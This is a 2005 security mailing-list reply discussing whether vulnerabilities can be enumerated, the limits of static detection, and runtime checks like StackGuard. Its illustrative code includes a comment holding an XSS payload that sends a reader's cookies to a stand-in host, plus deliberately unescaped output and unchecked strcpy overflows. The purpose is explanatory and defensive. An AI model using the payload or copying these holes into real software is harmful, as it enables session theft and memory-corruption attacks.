Secure Coding mailing list archives

Re: Theoretical question about vulnerabilities


From: Crispin Cowan <crispin () immunix com>
Date: Mon, 11 Apr 2005 03:20:50 +0100


Pascal Meunier wrote:


> Do you think it is possible to enumerate all the ways all vulnerabilities
> can be created?  Is the set of all possible exploitable programming mistakes
> bounded?


Yes and no.

Yes, if your enumeration is "1" and that is the set of all errors that 
allow an attacker to induce unexpected behavior from the program.


No is the serious answer: I do not believe it is possible to enumerate 
all of the ways to make a programming error. Sure, it is possible to 
enumerate all of the *commonly observed* errors that cause widespread 
problems. But enumerating all possible errors is impossible, because you 
cannot enumerate all programs.



> I would think that what makes it possible to talk about design patterns and
> attack patterns is that they reflect intentional actions towards "desirable"
> (for the perpetrator) goals, and the set of desirable goals is bounded at
> any given time (assuming infinite time, then perhaps it is not bounded).


Nope, sorry, I disbelieve that the set of attacker goals is bounded.


> However, once commonly repeated mistakes have been described and taken into
> account, I have a feeling that attempting to enumerate all other possible
> mistakes (leading to exploitable vulnerabilities), for example with the goal
> of producing a complete taxonomy, classification and theory of
> vulnerabilities, is not possible.

I agree that it is not possible. Consider that some time in the next 
decade, a new form of programming or technology will appear. It will 
introduce a new kind of pathology. We know that this will happen because 
it has already happened: Web forums that allow end-user content to be 
posted resulted in the phenomenon of Cross-Site Scripting.
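
To make that concrete, here is a toy sketch of the pathology (the
CGI-style handler and the evil.example URL are invented for
illustration): a handler that echoes user-posted content straight into
HTML. There is no memory error anywhere, yet the "comment" runs as code
in every reader's browser.

#include <stdio.h>
#include <stdlib.h>

/* Illustrative sketch only: a naive forum/guestbook handler.  A
 * "comment" such as
 *   <script>document.location='http://evil.example/?'+document.cookie</script>
 * is reflected verbatim and executes in the reader's browser. */
int main(void)
{
    const char *comment = getenv("QUERY_STRING");   /* attacker-controlled */

    printf("Content-Type: text/html\r\n\r\n");
    printf("<html><body><p>%s</p></body></html>\n",
           comment ? comment : "");                 /* no HTML escaping */
    return 0;
}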



> All we can hope is to come reasonably
> close and produce something useful, but not theoretically strong and closed.

Security is very simple. Only use perfect software :) For those who can 
afford it, perfect software is great. The rest of us will be fighting 
with insecure software forever.



> This should have consequences for source code vulnerability analysis
> software.  It should make it impossible to write software that detects all
> of these mistakes.

The impossibility of a perfect source-code vulnerability detector is a 
corollary of the undecidability of Alan Turing's original Halting Problem.
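
A rough sketch of the reduction (the function names are invented, and
this is a compile-only illustration): a detector that is both sound and
complete would have to decide whether the unsafe strcpy below is ever
reached, which means deciding whether an arbitrary computation halts.

#include <string.h>

void arbitrary_computation(void);    /* stands in for any program at all */

/* A perfect static detector must decide whether the strcpy is
 * reachable, i.e. whether arbitrary_computation() terminates --
 * undecidable in general. */
void maybe_vulnerable(const char *attacker_input)
{
    char buf[16];

    arbitrary_computation();         /* may or may not terminate */
    strcpy(buf, attacker_input);     /* reached only if it terminates;
                                        overflows on long input */
}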



> Is it enough to look for violations of some
> invariants (rules) without knowing how they happened?

Looking for run-time invariant violations is a basic way of getting 
around static undecidability induced by Turing's theorem. Switching from 
static to dynamic analysis comes with a host of strengths and 
weaknesses. For instance, StackGuard (which is really just a run-time 
enforcement of a single invariant) can detect buffer overflow 
vulnerabilities that static analyzers cannot detect. However, StackGuard 
cannot detect such a vulnerability until some attacker helpfully comes 
along and tries to exploit it.
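
Here is a hand-rolled sketch of that single invariant (simplified; the
real StackGuard emits the check in compiler-generated prologue/epilogue
code rather than in source, and the struct here is just a portable way
to pin the canary next to the buffer):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const unsigned long CANARY = 0xBADC0FFEUL;

/* The invariant: a canary word placed just past the local buffer must
 * still hold its original value when the function returns.  An
 * overflow of buf long enough to matter tramples the canary first,
 * and the check fires -- but only when such an input actually arrives. */
void copy_input(const char *input)
{
    struct {
        char buf[16];
        volatile unsigned long canary;   /* sits just past buf */
    } frame;

    frame.canary = CANARY;
    strcpy(frame.buf, input);            /* the unchecked copy under test */

    if (frame.canary != CANARY) {        /* invariant violated at run time */
        fprintf(stderr, "stack smashing detected\n");
        abort();
    }
}

int main(int argc, char **argv)
{
    copy_input(argc > 1 ? argv[1] : "");
    return 0;
}

Feed it a long enough argv[1] and the check fires; feed it benign input
and the latent overflow goes unnoticed -- which is exactly the
dynamic-detection limitation above.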



> Any thoughts on this?  Any references to relevant theories of failures and
> errors, or to explorations of this or similar ideas, would be welcome.  Of
> course, Albert Einstein's quote on the difference between genius and
> stupidity comes to mind :).

"Reliable software does what it is supposed to do. Secure software does 
what it is supposed to do and nothing else." -- Ivan Arce


"Security is very simple. Only use perfect software :) For those who can 
afford it, perfect software is great. The rest of us will be fighting 
with insecure software forever." -- me :)


Crispin

--
Crispin Cowan, Ph.D.  http://immunix.com/~crispin/
CTO, Immunix          http://immunix.com





